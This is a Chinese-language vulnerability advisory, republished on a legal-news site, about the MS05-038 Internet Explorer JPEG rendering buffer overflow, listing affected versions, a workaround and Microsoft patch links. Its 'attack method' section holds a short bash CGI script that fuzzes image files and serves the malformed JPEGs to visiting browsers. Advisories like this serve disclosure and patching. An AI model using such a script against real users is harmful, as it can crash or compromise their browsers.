法搜网--搜尽天下法律信息
本站网络实名:法搜
设为首页  |  法搜首页 |  法搜论坛 |  法搜排行榜 |  法律新闻  |  案例

  请您加入我们的"法律聚焦"邮件列表.
  报道法律热门新闻、经典案例分析、法律实事讨论

  
  文章搜索
内 容
类 别
  今日热点

上下班被自行车撞伤纳入工伤
刑法修正案八草案提请审议
男子强奸16女子被注射式死刑
女经理15张信用卡透支24万
绑匪心软偷放女人质后自首
检察院决定不予逮捕
国务院首次明确推进房产税改革
北京中小学取消户籍壁垒
外地生可免费入学
河南坐11年冤狱农民赵作海获65万...
百度告青岛联通流量劫持案件胜诉
  首页 >> 网络安全 >> 最新漏洞
Microsoft Internet Explorer JPEG图形渲染溢出漏洞(MS05-038)
WWW.FSOU.COM 来源:www.fsou.com 时间:2005-10-21

 
涉及程序:
Microsoft IE 程序
 
描述:
Microsoft Internet Explorer JPEG图形渲染溢出漏洞(MS05-038)
 
详细:
Microsoft Internet Explorer是非常流行的WEB浏览器。

Microsoft Internet Explorer浏览器所使用的JPEG图形渲染库中存在缓冲区溢出漏洞,成功的攻击可以导致执行任意代码。

起因是拷贝操作之前没有执行正确的边界检查。攻击者可以通过创建随机的浏览器输入来利用这个漏洞。

<*来源:Michal Zalewski (lcamtuf@echelon.pl

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112144761123607&w=
     http://www.microsoft.com/technet/security/Bulletin/MS05-038.mspx?pf=true
     http://www.us-cert.gov/cas/techalerts/TA05-221A.html
*>

受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 5.5 SP2
   - Microsoft Windows ME
Microsoft Internet Explorer 6.0
   - Microsoft Windows XP SP2
   - Microsoft Windows Server 2003 SP1
   - Microsoft Windows Server 2003
 
攻击方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/bash

echo "Content-Type: text/html"
echo

ID="timg-$$-$RANDOM-$RANDOM"

rm -f timg-* AFX.log

cat <<_EOF_
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" content="0;URL=/">
</HEAD>
<BODY>
_EOF_

CNT=0

for i in img/*; do
CNT="$[CNT+1]"
FNAM="$ID-$CNT"
EXT=`echo $i | cut -d. -f2`
./afx-loc -p 1 -i 100 -m RANDOM -s 60000 <$i 2>$FNAM.$EXT >>AFX.log
echo "Test $CNT - <IMG SRC=\"$FNAM.$EXT\"><BR>"
done
 
解决方案:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 如果在使用Outlook 2002或之后版本,或Outlook Express 6 SP1或之后版本的话,以纯文本格式阅读e-mail消息可以帮助防范HTML e-mail攻击

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS05-038)以及相应补丁:
MS05-038:Cumulative Security Update for Internet Explorer (896727)
链接:http://www.microsoft.com/technet/security/Bulletin/MS05-038.mspx?pf=true

补丁下载:

Microsoft Windows 2000 Service Pack 4上的Internet Explorer 5.01 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?FamilyId=194E0EE7-919C-4A8B-AD8D-01A4FE771942

Microsoft Windows 2000 Service Pack 4或Microsoft Windows XP Service Pack 1上的Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?FamilyId=68300B15-1CF9-45FB-875E-2EF6D2FBC9ED

Microsoft Windows XP Service Pack 2的Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?FamilyId=648B6F0E-1695-44E5-826A-43406DF4858E

Microsoft Windows Server 2003和Microsoft Windows Server 2003 Service Pack 1的Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?FamilyId=F0B96EC3-E954-423A-9AB0-5712B9F14637
  
Microsoft Windows Server 2003 for Itanium-based Systems和Microsoft Windows Server 2003 with SP1 for Itanium-based Systems的Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?FamilyId=C24D3738-213A-41B8-84A3-2842B34D7B10

Microsoft Windows Server 2003 x64 Edition的Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?FamilyId=F2D544E7-33F5-4A65-A574-15495B05B883

Microsoft Windows XP Professional x64 Edition的Internet Explorer
http://www.microsoft.com/downloads/details.aspx?FamilyId=1181BC67-0A1D-4A06-99AC-5B2BC6DFE0F6
 
  相关文章
Microsoft Windows MSRPC SVCCTL服务枚举漏洞 (2005.10.21)
Microsoft Windows MSRPC Eventlog信息泄漏漏洞 (2005.10.21)
COM 对象 (Msdds.dll) 可能导致 Internet Explorer 意外退出(2005.10.21)
Microsoft Windows PKINIT信息泄漏和欺骗漏洞(MS05-042) (2005.10.21)
Microsoft Windows RDP远程桌面协议拒绝服务漏洞(MS05-041) (2005.10.21)
Microsoft Windows Kerberos拒绝服务漏洞(MS05-042) (2005.10.21)
Microsoft Windows Telephony服务远程代码执行漏洞(MS05-040)(2005.10.21)
Microsoft Visual Studio .NET msdds.dll远程代码执行漏洞(2005.10.21)
Microsoft IIS 5.1 FAT/FAT32文件系统网页源码泄露漏洞(2005.10.21)
Microsoft Windows键盘事件权限提升漏洞(2005.10.21)
 
设为首页  |  法搜首页 |  法搜论坛 |  法搜排行榜 |  关于法搜  |  招聘信息

本站网络实名:法搜 Copyright © 2007 FSou!  京ICP备05006567号不良信息举报中心
1 1